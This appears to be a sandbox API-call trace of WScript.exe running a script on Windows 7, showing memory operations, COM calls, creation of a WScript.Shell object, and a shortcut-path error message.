	[0053.731] ??3@YAXPEAX@Z () returned 0x2400050001
	[0053.731] ??3@YAXPEAX@Z () returned 0x8000e0001
	[0053.731] ??3@YAXPEAX@Z () returned 0x9000b0001
	[0053.731] ??3@YAXPEAX@Z () returned 0xa00080001
	[0053.731] ??3@YAXPEAX@Z () returned 0xb00050001
	[0053.731] ??3@YAXPEAX@Z () returned 0xc007a0001
	[0053.732] MulDiv (nNumber=491, nNumerator=100, nDenominator=917) returned 54
	[0053.732] IUnknown:Release (This=0x35f420) returned 0x1
	[0053.732] GetTickCount () returned 0x1e629
	[0053.732] ??2@YAPEAX_K@Z () returned 0x457a90
	[0053.733] ??2@YAPEAX_K@Z () returned 0x457a90
	[0053.733] ??2@YAPEAX_K@Z () returned 0x457ac0
	[0053.733] ??2@YAPEAX_K@Z () returned 0x457af0
	[0053.733] ??2@YAPEAX_K@Z () returned 0x457af0
	[0053.734] ??2@YAPEAX_K@Z () returned 0x457b20
	[0053.734] ??2@YAPEAX_K@Z () returned 0x457b50
	[0053.734] ??2@YAPEAX_K@Z () returned 0x457b50
	[0053.734] ??2@YAPEAX_K@Z () returned 0x457b80
	[0053.735] ??2@YAPEAX_K@Z () returned 0x457bb0
	[0053.735] ??2@YAPEAX_K@Z () returned 0x457bb0
	[0053.735] ??2@YAPEAX_K@Z () returned 0x457be0
	[0053.735] ??2@YAPEAX_K@Z () returned 0x457c10
	[0053.736] ??2@YAPEAX_K@Z () returned 0x457c10
	[0053.736] ??2@YAPEAX_K@Z () returned 0x457c40
	[0053.737] ??2@YAPEAX_K@Z () returned 0x457c70
	[0053.737] ??2@YAPEAX_K@Z () returned 0x457c70
	[0053.737] ??2@YAPEAX_K@Z () returned 0x457ca0
	[0053.737] ??2@YAPEAX_K@Z () returned 0x457cd0
	[0053.738] ??2@YAPEAX_K@Z () returned 0x457cd0
	[0053.738] ??2@YAPEAX_K@Z () returned 0x457d00
	[0053.738] ??2@YAPEAX_K@Z () returned 0x457d30
	[0053.738] ??2@YAPEAX_K@Z () returned 0x457d30
	[0053.739] ??2@YAPEAX_K@Z () returned 0x457d60
	[0053.739] ??2@YAPEAX_K@Z () returned 0x457d90
	[0053.739] ??2@YAPEAX_K@Z () returned 0x457d90
	[0053.739] ??2@YAPEAX_K@Z () returned 0x457dc0
	[0053.740] ??2@YAPEAX_K@Z () returned 0x457df0
	[0053.740] ??2@YAPEAX_K@Z () returned 0x457df0
	[0053.740] ??2@YAPEAX_K@Z () returned 0x457e20
	[0053.740] ??2@YAPEAX_K@Z () returned 0x457e50
	[0053.741] ??2@YAPEAX_K@Z () returned 0x457e50
	[0053.741] ??2@YAPEAX_K@Z () returned 0x457e80
	[0053.741] ??2@YAPEAX_K@Z () returned 0x457eb0
	[0053.741] ??2@YAPEAX_K@Z () returned 0x457eb0
	[0053.742] ??2@YAPEAX_K@Z () returned 0x457ee0
	[0053.742] ??2@YAPEAX_K@Z () returned 0x457f10
	[0053.742] ??2@YAPEAX_K@Z () returned 0x457f10
	[0053.742] ??2@YAPEAX_K@Z () returned 0x457f40
	[0053.743] ??2@YAPEAX_K@Z () returned 0x457f70
	[0053.743] ??2@YAPEAX_K@Z () returned 0x457f70
	[0053.743] ??2@YAPEAX_K@Z () returned 0x45ab90
	[0053.743] ??2@YAPEAX_K@Z () returned 0x45abc0
	[0053.744] ??2@YAPEAX_K@Z () returned 0x45abc0
	[0053.744] ??2@YAPEAX_K@Z () returned 0x45abf0
	[0053.744] ??2@YAPEAX_K@Z () returned 0x45ac20
	[0053.744] ??2@YAPEAX_K@Z () returned 0x45ac20
	[0053.745] ??2@YAPEAX_K@Z () returned 0x45ac50
	[0053.745] ??2@YAPEAX_K@Z () returned 0x45ac80
	[0053.745] ??2@YAPEAX_K@Z () returned 0x45ac80
	[0053.745] ??2@YAPEAX_K@Z () returned 0x45acb0
	[0053.745] ??2@YAPEAX_K@Z () returned 0x45ace0
	[0053.746] ??2@YAPEAX_K@Z () returned 0x45ace0
	[0053.746] ??2@YAPEAX_K@Z () returned 0x45ad10
	[0053.747] ??2@YAPEAX_K@Z () returned 0x45ad40
	[0053.747] ??2@YAPEAX_K@Z () returned 0x45ad40
	[0053.747] ??2@YAPEAX_K@Z () returned 0x45ad70
	[0053.747] ??2@YAPEAX_K@Z () returned 0x45ada0
	[0053.748] ??2@YAPEAX_K@Z () returned 0x45ada0
	[0053.748] ??2@YAPEAX_K@Z () returned 0x45add0
	[0053.749] CoGetObjectContext (in: riid=0x7fee3286350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2495e8 | out: ppv=0x2495e8*=0x35f420) returned 0x0
	[0053.749] MulDiv (nNumber=256, nNumerator=100, nDenominator=938) returned 27
	[0053.749] IUnknown:Release (This=0x35f420) returned 0x1
	[0053.749] GetTickCount () returned 0x1e639
	[0053.751] realloc (_Block=0x0, _Size=0xc8) returned 0x454520
	[0053.815] ??2@YAPEAX_K@Z () returned 0x463bf0
	[0053.816] ??2@YAPEAX_K@Z () returned 0x452a20
	[0053.816] malloc (_Size=0x80) returned 0x450b20
	[0053.816] malloc (_Size=0x108) returned 0x318930
	[0053.817] ??2@YAPEAX_K@Z () returned 0x490a20
	[0053.818] realloc (_Block=0x0, _Size=0x64) returned 0x454520
	[0053.818] realloc (_Block=0x0, _Size=0x27c) returned 0x45caf0
	[0053.819] free (_Block=0x454520) 
	[0053.819] ??2@YAPEAX_K@Z () returned 0x464d70
	[0053.819] CoGetObjectContext (in: riid=0x7fee3286350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x247858 | out: ppv=0x247858*=0x35f420) returned 0x0
	[0053.820] ??3@YAXPEAX@Z () returned 0x15720801
	[0053.820] ??3@YAXPEAX@Z () returned 0x1
	[0053.820] ??3@YAXPEAX@Z () returned 0x1900050001
	[0053.820] ??3@YAXPEAX@Z () returned 0x3400200001
	[0053.821] free (_Block=0x45ffd0) 
	[0053.821] free (_Block=0x455550) 
	[0053.821] free (_Block=0x4613e0) 
	[0053.821] free (_Block=0x45ebc0) 
	[0053.822] free (_Block=0x45d7a0) 
	[0053.822] free (_Block=0x45cd80) 
	[0053.822] free (_Block=0x45c860) 
	[0053.822] ??3@YAXPEAX@Z () returned 0x15720801
	[0053.822] ??3@YAXPEAX@Z () returned 0x15720801
	[0053.822] ??3@YAXPEAX@Z () returned 0x59000b0001
	[0053.822] free (_Block=0x491530) 
	[0053.822] ??3@YAXPEAX@Z () returned 0x15720801
	[0053.822] MulDiv (nNumber=669, nNumerator=100, nDenominator=1194) returned 56
	[0053.822] IUnknown:Release (This=0x35f420) returned 0x1
	[0053.822] GetTickCount () returned 0x1e677
	[0053.823] ??2@YAPEAX_K@Z () returned 0x45ba70
	[0053.823] CoGetObjectContext (in: riid=0x7fee3286350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2495e8 | out: ppv=0x2495e8*=0x35f420) returned 0x0
	[0053.824] MulDiv (nNumber=470, nNumerator=100, nDenominator=1042) returned 45
	[0053.824] IUnknown:Release (This=0x35f420) returned 0x1
	[0053.824] GetTickCount () returned 0x1e677
	[0053.824] CoGetObjectContext (in: riid=0x7fee3286350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2495e8 | out: ppv=0x2495e8*=0x35f420) returned 0x0
	[0053.824] MulDiv (nNumber=256, nNumerator=100, nDenominator=1084) returned 24
	[0053.824] IUnknown:Release (This=0x35f420) returned 0x1
	[0053.824] GetTickCount () returned 0x1e677
	[0053.827] ??2@YAPEAX_K@Z () returned 0x463840
	[0053.831] ??2@YAPEAX_K@Z () returned 0x4511a0
	[0053.832] realloc (_Block=0x0, _Size=0x64) returned 0x492700
	[0053.832] realloc (_Block=0x0, _Size=0xc8) returned 0x454520
	[0053.832] free (_Block=0x492700) 
	[0053.833] ??2@YAPEAX_K@Z () returned 0x469b10
	[0053.835] ??2@YAPEAX_K@Z () returned 0x46a760
	[0053.836] ??2@YAPEAX_K@Z () returned 0x492700
	[0053.837] MulDiv (nNumber=723, nNumerator=100, nDenominator=1341) returned 54
	[0053.837] IUnknown:Release (This=0x35f420) returned 0x1
	[0053.837] GetTickCount () returned 0x1e687
	[0053.840] malloc (_Size=0x208) returned 0x492cf0
	[0053.840] ??2@YAPEAX_K@Z () returned 0x4647e0
	[0053.841] ??2@YAPEAX_K@Z () returned 0x490a20
	[0053.842] ??2@YAPEAX_K@Z () returned 0x46aa00
	[0053.843] ??2@YAPEAX_K@Z () returned 0x4511a0
	[0053.843] MulDiv (nNumber=369, nNumerator=100, nDenominator=1130) returned 33
	[0053.844] IUnknown:Release (This=0x35f420) returned 0x1
	[0053.844] GetTickCount () returned 0x1e687
	[0053.844] MulDiv (nNumber=461, nNumerator=100, nDenominator=1275) returned 36
	[0053.844] IUnknown:Release (This=0x35f420) returned 0x1
	[0053.844] GetTickCount () returned 0x1e687
	[0053.845] MulDiv (nNumber=256, nNumerator=100, nDenominator=1326) returned 19
	[0053.845] IUnknown:Release (This=0x35f420) returned 0x1
	[0053.845] GetTickCount () returned 0x1e687
	[0053.846] ??2@YAPEAX_K@Z () returned 0x462e00
	[0053.847] ??2@YAPEAX_K@Z () returned 0x490a20
	[0053.848] MulDiv (nNumber=695, nNumerator=100, nDenominator=1583) returned 44
	[0053.848] IUnknown:Release (This=0x35f420) returned 0x1
	[0053.848] GetTickCount () returned 0x1e687
	[0053.849] ??2@YAPEAX_K@Z () returned 0x455b50
	[0053.850] ??2@YAPEAX_K@Z () returned 0x4511a0
	[0053.851] MulDiv (nNumber=550, nNumerator=100, nDenominator=1402) returned 39
	[0053.851] IUnknown:Release (This=0x35f420) returned 0x1
	[0053.851] GetTickCount () returned 0x1e687
	[0053.851] MulDiv (nNumber=256, nNumerator=100, nDenominator=1364) returned 19
	[0053.851] IUnknown:Release (This=0x35f420) returned 0x1
	[0053.851] GetTickCount () returned 0x1e687
	[0053.852] ??2@YAPEAX_K@Z () returned 0x456fa0
	[0053.853] ??2@YAPEAX_K@Z () returned 0x490a20
	[0053.854] MulDiv (nNumber=604, nNumerator=100, nDenominator=1620) returned 37
	[0053.854] IUnknown:Release (This=0x35f420) returned 0x1
	[0053.854] GetTickCount () returned 0x1e696
	[0053.855] ??2@YAPEAX_K@Z () returned 0x464ba0
	[0053.856] ??2@YAPEAX_K@Z () returned 0x4511a0
	[0053.857] ??2@YAPEAX_K@Z () returned 0x46a910
	[0053.858] ??2@YAPEAX_K@Z () returned 0x492700
	[0053.859] MulDiv (nNumber=489, nNumerator=100, nDenominator=1535) returned 32
	[0053.859] IUnknown:Release (This=0x35f420) returned 0x1
	[0053.859] GetTickCount () returned 0x1e696
	[0053.860] malloc (_Size=0x408) returned 0x472c90
	[0053.860] realloc (_Block=0x0, _Size=0xa0) returned 0x452ad0
	[0053.860] ??2@YAPEAX_K@Z () returned 0x46aa90
	[0053.861] ??2@YAPEAX_K@Z () returned 0x4511a0
	[0053.862] MulDiv (nNumber=425, nNumerator=100, nDenominator=1559) returned 27
	[0053.862] IUnknown:Release (This=0x35f420) returned 0x1
	[0053.862] GetTickCount () returned 0x1e696
	[0053.863] ??2@YAPEAX_K@Z () returned 0x45c0c0
	[0053.864] ??2@YAPEAX_K@Z () returned 0x490a20
	[0053.884] MulDiv (nNumber=494, nNumerator=100, nDenominator=1646) returned 30
	[0053.884] IUnknown:Release (This=0x35f420) returned 0x1
	[0053.884] GetTickCount () returned 0x1e6a6
	[0053.885] ??2@YAPEAX_K@Z () returned 0x45b950
	[0053.886] ??2@YAPEAX_K@Z () returned 0x4511a0
	[0053.888] ??2@YAPEAX_K@Z () returned 0x4630d0
	[0053.889] ??2@YAPEAX_K@Z () returned 0x492700
	[0053.890] MulDiv (nNumber=494, nNumerator=100, nDenominator=1665) returned 30
	[0053.890] IUnknown:Release (This=0x35f420) returned 0x1
	[0053.890] GetTickCount () returned 0x1e6b5
	[0053.891] ??2@YAPEAX_K@Z () returned 0x464900
	[0053.892] ??2@YAPEAX_K@Z () returned 0x4511a0
	[0053.893] ??2@YAPEAX_K@Z () returned 0x45bb30
	[0053.893] GetVersionExA (in: lpVersionInformation=0x24c8e0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x3112f0, dwBuildNumber=0x0, dwPlatformId=0x35e198, szCSDVersion="") | out: lpVersionInformation=0x24c8e0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0053.893] FindResourceA (hModule=0x7fee31e0000, lpName=0x139, lpType=0x6) returned 0x1207f8
	[0053.894] LoadResource (hModule=0x7fee31e0000, hResInfo=0x1207f8) returned 0x121d44
	[0053.894] LockResource (hResData=0x121d44) returned 0x121d44
	[0053.894] SizeofResource (hModule=0x7fee31e0000, hResInfo=0x1207f8) returned 0x15c
	[0053.894] FreeResource (hResData=0x121d44) returned 0
	[0053.894] FindResourceA (hModule=0x7fee31e0000, lpName=0x101, lpType=0x6) returned 0x1207e8
	[0053.894] LoadResource (hModule=0x7fee31e0000, hResInfo=0x1207e8) returned 0x121c74
	[0053.894] LockResource (hResData=0x121c74) returned 0x121c74
	[0053.894] SizeofResource (hModule=0x7fee31e0000, hResInfo=0x1207e8) returned 0xce
	[0053.895] FreeResource (hResData=0x121c74) returned 0
	[0053.895] bsearch (_Key=0x24d278, _Base=0x7fee32aa3c0, _NumOfElements=0x5d, _SizeOfElements=0x8, _PtFuncCompare=0x7fee32381a0) returned 0x7fee32aa5a8
	[0053.895] ??2@YAPEAX_K@Z () returned 0x490a20
	[0053.896] ??2@YAPEAX_K@Z () returned 0x473120
	[0053.897] MulDiv (nNumber=363, nNumerator=100, nDenominator=1688) returned 22
	[0053.897] IUnknown:Release (This=0x35f420) returned 0x1
	[0053.897] GetTickCount () returned 0x1e6b5
	[0053.899] ??2@YAPEAX_K@Z () returned 0x4511a0
	[0053.901] ??2@YAPEAX_K@Z () returned 0x45cb30
	[0053.901] ??2@YAPEAX_K@Z () returned 0x492700
	[0053.903] MulDiv (nNumber=446, nNumerator=100, nDenominator=1837) returned 24
	[0053.903] IUnknown:Release (This=0x35f420) returned 0x1
	[0053.903] GetTickCount () returned 0x1e6c5
	[0053.903] MulDiv (nNumber=560, nNumerator=100, nDenominator=1904) returned 29
	[0053.903] IUnknown:Release (This=0x35f420) returned 0x1
	[0053.903] GetTickCount () returned 0x1e6c5
	[0053.904] MulDiv (nNumber=256, nNumerator=100, nDenominator=1856) returned 14
	[0053.904] IUnknown:Release (This=0x35f420) returned 0x1
	[0053.904] GetTickCount () returned 0x1e6c5
	[0053.905] ??2@YAPEAX_K@Z () returned 0x475ee0
	[0053.908] ??2@YAPEAX_K@Z () returned 0x473120
	[0053.910] ??2@YAPEAX_K@Z () returned 0x4d3c00
	[0053.910] ??2@YAPEAX_K@Z () returned 0x4511a0
	[0053.910] GetTickCount () returned 0x1e6c5
	[0053.911] CoGetObjectContext (in: riid=0x7fee3286350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2495e8 | out: ppv=0x2495e8*=0x35f420) returned 0x0
	[0053.912] realloc (_Block=0x452ad0, _Size=0x140) returned 0x465720
	[0053.912] ??2@YAPEAX_K@Z () returned 0x45be60
	[0053.913] ??2@YAPEAX_K@Z () returned 0x473120
	[0053.913] GetTickCount () returned 0x1e6c5
	[0053.913] CoGetObjectContext (in: riid=0x7fee3286350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2495e8 | out: ppv=0x2495e8*=0x35f420) returned 0x0
	[0053.915] ??2@YAPEAX_K@Z () returned 0x47c0c0
	[0053.916] ??2@YAPEAX_K@Z () returned 0x4511a0
	[0053.916] GetTickCount () returned 0x1e6c5
	[0053.916] CoGetObjectContext (in: riid=0x7fee3286350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2495e8 | out: ppv=0x2495e8*=0x35f420) returned 0x0
	[0053.916] free (_Block=0x4a4410) 
	[0053.916] free (_Block=0x455550) 
	[0053.916] free (_Block=0x478730) 
	[0053.916] free (_Block=0x4a3000) 
	[0053.916] free (_Block=0x493000) 
	[0053.916] free (_Block=0x46acc0) 
	[0053.916] free (_Block=0x45e9e0) 
	[0053.916] ??3@YAXPEAX@Z () returned 0x15720801
	[0053.917] ??3@YAXPEAX@Z () returned 0x15720801
	[0053.918] ??2@YAPEAX_K@Z () returned 0x47c300
	[0053.919] ??2@YAPEAX_K@Z () returned 0x473120
	[0053.922] ??2@YAPEAX_K@Z () returned 0x474580
	[0053.923] ??2@YAPEAX_K@Z () returned 0x492700
	[0053.923] GetTickCount () returned 0x1e6d5
	[0053.923] CoGetObjectContext (in: riid=0x7fee3286350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2495e8 | out: ppv=0x2495e8*=0x35f420) returned 0x0
	[0053.923] free (_Block=0x4a4410) 
	[0053.923] free (_Block=0x455550) 
	[0053.923] free (_Block=0x478730) 
	[0053.923] free (_Block=0x4a3000) 
	[0053.923] free (_Block=0x493000) 
	[0053.923] free (_Block=0x46acc0) 
	[0053.923] free (_Block=0x45e9e0) 
	[0053.923] ??3@YAXPEAX@Z () returned 0x15720801
	[0053.923] ??3@YAXPEAX@Z () returned 0x15720801
	[0053.925] malloc (_Size=0x808) returned 0x475f20
	[0053.925] ??2@YAPEAX_K@Z () returned 0x474850
	[0053.926] ??2@YAPEAX_K@Z () returned 0x473120
	[0053.928] ??2@YAPEAX_K@Z () returned 0x47c7e0
	[0053.928] ??2@YAPEAX_K@Z () returned 0x4511a0
	[0053.930] ??2@YAPEAX_K@Z () returned 0x47afd0
	[0053.931] ??2@YAPEAX_K@Z () returned 0x45e0a0
	[0053.931] GetTickCount () returned 0x1e6d5
	[0053.931] CoGetObjectContext (in: riid=0x7fee3286350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2495e8 | out: ppv=0x2495e8*=0x35f420) returned 0x0
	[0053.933] ??2@YAPEAX_K@Z () returned 0x4d30f0
	[0053.933] ??2@YAPEAX_K@Z () returned 0x473120
	[0053.935] ??2@YAPEAX_K@Z () returned 0x4d3930
	[0053.935] ??2@YAPEAX_K@Z () returned 0x4511a0
	[0053.937] ??2@YAPEAX_K@Z () returned 0x47c8a0
	[0053.938] ??2@YAPEAX_K@Z () returned 0x45e120
	[0053.938] GetTickCount () returned 0x1e6e4
	[0053.938] CoGetObjectContext (in: riid=0x7fee3286350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2495e8 | out: ppv=0x2495e8*=0x35f420) returned 0x0
	[0053.938] free (_Block=0x4a4410) 
	[0053.938] free (_Block=0x455550) 
	[0053.938] free (_Block=0x478730) 
	[0053.938] free (_Block=0x4a3000) 
	[0053.938] free (_Block=0x493000) 
	[0053.938] free (_Block=0x46acc0) 
	[0053.939] free (_Block=0x45e9e0) 
	[0053.939] ??3@YAXPEAX@Z () returned 0x15720801
	[0053.939] ??3@YAXPEAX@Z () returned 0x15720801
	[0053.940] ??2@YAPEAX_K@Z () returned 0x45bef0
	[0053.941] ??2@YAPEAX_K@Z () returned 0x473120
	[0053.941] GetTickCount () returned 0x1e6e4
	[0053.941] CoGetObjectContext (in: riid=0x7fee3286350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2495e8 | out: ppv=0x2495e8*=0x35f420) returned 0x0
	[0053.943] MulDiv (nNumber=756, nNumerator=100, nDenominator=3006) returned 25
	[0053.943] IUnknown:Release (This=0x35f420) returned 0x1
	[0053.943] GetTickCount () returned 0x1e6e4
	[0053.944] ??2@YAPEAX_K@Z () returned 0x4d9f00
	[0053.945] ??2@YAPEAX_K@Z () returned 0x4511a0
	[0053.947] ??2@YAPEAX_K@Z () returned 0x4da5c0
	[0053.948] ??2@YAPEAX_K@Z () returned 0x492700
	[0053.949] MulDiv (nNumber=1142, nNumerator=100, nDenominator=3532) returned 32
	[0053.949] IUnknown:Release (This=0x35f420) returned 0x1
	[0053.949] GetTickCount () returned 0x1e6e4
	[0053.950] ??2@YAPEAX_K@Z () returned 0x4e2e30
	[0053.951] ??2@YAPEAX_K@Z () returned 0x4511a0
	[0053.952] ??2@YAPEAX_K@Z () returned 0x4e3a30
	[0053.953] ??2@YAPEAX_K@Z () returned 0x473120
	[0054.206] ??2@YAPEAX_K@Z () returned 0x45e0a0
	[0054.206] ??2@YAPEAX_K@Z () returned 0x45e110
	[0054.209] ??2@YAPEAX_K@Z () returned 0x4511a0
	[0054.212] ??2@YAPEAX_K@Z () returned 0x473120
	[0054.216] MulDiv (nNumber=941, nNumerator=100, nDenominator=3335) returned 28
	[0054.216] IUnknown:Release (This=0x35f420) returned 0x1
	[0054.216] GetTickCount () returned 0x1e713
	[0054.220] MulDiv (nNumber=985, nNumerator=100, nDenominator=3412) returned 29
	[0054.220] IUnknown:Release (This=0x35f420) returned 0x1
	[0054.220] GetTickCount () returned 0x1e713
	[0054.223] MulDiv (nNumber=997, nNumerator=100, nDenominator=3476) returned 29
	[0054.223] IUnknown:Release (This=0x35f420) returned 0x1
	[0054.223] GetTickCount () returned 0x1e713
	[0054.227] MulDiv (nNumber=1016, nNumerator=100, nDenominator=3496) returned 29
	[0054.227] IUnknown:Release (This=0x35f420) returned 0x1
	[0054.227] GetTickCount () returned 0x1e713
	[0054.229] MulDiv (nNumber=1128, nNumerator=100, nDenominator=3607) returned 31
	[0054.229] IUnknown:Release (This=0x35f420) returned 0x1
	[0054.229] GetTickCount () returned 0x1e713
	[0054.232] MulDiv (nNumber=984, nNumerator=100, nDenominator=3525) returned 28
	[0054.233] IUnknown:Release (This=0x35f420) returned 0x1
	[0054.233] GetTickCount () returned 0x1e723
	[0054.236] MulDiv (nNumber=980, nNumerator=100, nDenominator=3576) returned 27
	[0054.236] IUnknown:Release (This=0x35f420) returned 0x1
	[0054.236] GetTickCount () returned 0x1e723
	[0054.243] MulDiv (nNumber=979, nNumerator=100, nDenominator=3636) returned 27
	[0054.243] IUnknown:Release (This=0x35f420) returned 0x1
	[0054.243] GetTickCount () returned 0x1e723
	[0054.247] MulDiv (nNumber=990, nNumerator=100, nDenominator=3729) returned 27
	[0054.247] IUnknown:Release (This=0x35f420) returned 0x1
	[0054.247] GetTickCount () returned 0x1e732
	[0054.251] MulDiv (nNumber=1186, nNumerator=100, nDenominator=3760) returned 32
	[0054.251] IUnknown:Release (This=0x35f420) returned 0x1
	[0054.251] GetTickCount () returned 0x1e732
	[0054.254] MulDiv (nNumber=969, nNumerator=100, nDenominator=3591) returned 27
	[0054.254] IUnknown:Release (This=0x35f420) returned 0x1
	[0054.254] GetTickCount () returned 0x1e732
	[0054.258] MulDiv (nNumber=1015, nNumerator=100, nDenominator=3620) returned 28
	[0054.258] IUnknown:Release (This=0x35f420) returned 0x1
	[0054.258] GetTickCount () returned 0x1e732
	[0054.269] MulDiv (nNumber=958, nNumerator=100, nDenominator=3645) returned 26
	[0054.269] IUnknown:Release (This=0x35f420) returned 0x1
	[0054.269] GetTickCount () returned 0x1e742
	[0054.280] _resetstkoflw () returned 0x1
	[0054.281] FindResourceA (hModule=0x7fee31e0000, lpName=0x2, lpType=0x6) returned 0x120718
	[0054.281] LoadResource (hModule=0x7fee31e0000, hResInfo=0x120718) returned 0x120b6c
	[0054.281] LockResource (hResData=0x120b6c) returned 0x120b6c
	[0054.281] SizeofResource (hModule=0x7fee31e0000, hResInfo=0x120718) returned 0x86
	[0054.281] FreeResource (hResData=0x120b6c) returned 0
	[0054.281] FindResourceA (hModule=0x7fee31e0000, lpName=0x101, lpType=0x6) returned 0x1207e8
	[0054.281] LoadResource (hModule=0x7fee31e0000, hResInfo=0x1207e8) returned 0x121c74
	[0054.281] LockResource (hResData=0x121c74) returned 0x121c74
	[0054.281] SizeofResource (hModule=0x7fee31e0000, hResInfo=0x1207e8) returned 0xce
	[0054.282] FreeResource (hResData=0x121c74) returned 0
	[0054.282] GetTickCount () returned 0x1e751
	[0054.282] bsearch (_Key=0x163438, _Base=0x7fee32aa3c0, _NumOfElements=0x5d, _SizeOfElements=0x8, _PtFuncCompare=0x7fee32381a0) returned 0x7fee32aa410
	[0054.282] ??2@YAPEAX_K@Z () returned 0x451420
	[0054.283] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x7fefea30000
	[0054.283] GetProcAddress (hModule=0x7fefea30000, lpProcName="CLSIDFromProgIDEx") returned 0x7fefea4a4c4
	[0054.283] CLSIDFromProgIDEx (in: lpszProgID="WScript.Shell", lpclsid=0x24d070 | out: lpclsid=0x24d070*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8))) returned 0x0
	[0054.286] SysStringLen (param_1=0x0) returned 0x0
	[0054.287] GetProcAddress (hModule=0x7fefea30000, lpProcName="CoGetClassObject") returned 0x7fefea62e18
	[0054.287] CoGetClassObject (in: rclsid=0x24d070*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fee3286300*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x24d040 | out: ppv=0x24d040*=0x4d9380) returned 0x0
	[0054.292] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x24b310 | out: lpSystemTimeAsFileTime=0x24b310*(dwLowDateTime=0x98eaeb40, dwHighDateTime=0x1d543d1)) 
	[0054.292] GetCurrentProcessId () returned 0x41c
	[0054.292] GetCurrentThreadId () returned 0x8c0
	[0054.292] GetTickCount () returned 0x1e751
	[0054.292] QueryPerformanceCounter (in: lpPerformanceCount=0x24b318 | out: lpPerformanceCount=0x24b318*=17871817518) returned 1
	[0054.292] malloc (_Size=0x100) returned 0x4d8cb0
	[0054.292] GetVersionExA (in: lpVersionInformation=0x24b0f0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0xe27c2dc8, dwBuildNumber=0x7fe, dwPlatformId=0xe27b0000, szCSDVersion="\xfe\x07") | out: lpVersionInformation=0x24b0f0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0054.292] GetUserDefaultLCID () returned 0x409
	[0054.292] ??2@YAPEAX_K@Z () returned 0x4d9380
	[0054.293] ??2@YAPEAX_K@Z () returned 0x4e78a0
	[0054.293] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x24ce70, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\WScript.exe" (normalized: "c:\\windows\\system32\\wscript.exe")) returned 0x1f
	[0054.293] lstrlenA (lpString="\\wscript.exe") returned 12
	[0054.293] lstrlenA (lpString="C:\\Windows\\System32\\WScript.exe") returned 31
	[0054.293] _strcmpi (_Str1="\\WScript.exe", _Str2="\\wscript.exe") returned 0
	[0054.293] GetModuleHandleA (lpModuleName=0x0) returned 0xff8d0000
	[0054.293] GetProcAddress (hModule=0xff8d0000, lpProcName=0x1) returned 0xff8dd7f8
	[0054.293] ??3@YAXPEAX@Z () returned 0x3b003e0001
	[0054.293] GetTickCount () returned 0x1e761
	[0054.293] malloc (_Size=0x808) returned 0x4e5ff0
	[0054.299] CreateErrorInfo (in: pperrinfo=0x24c110 | out: pperrinfo=0x24c110*=0x38a718) returned 0x0
	[0054.299] CErrorObject::SetGUID () returned 0x0
	[0054.299] CErrorObject::SetSource () returned 0x0
	[0054.300] LoadStringW (in: hInstance=0x7fee27b0000, uID=0x1004, lpBuffer=0x24a850, cchBufferMax=2048 | out: lpBuffer="The shortcut pathname must end with .lnk or .url.") returned 0x31
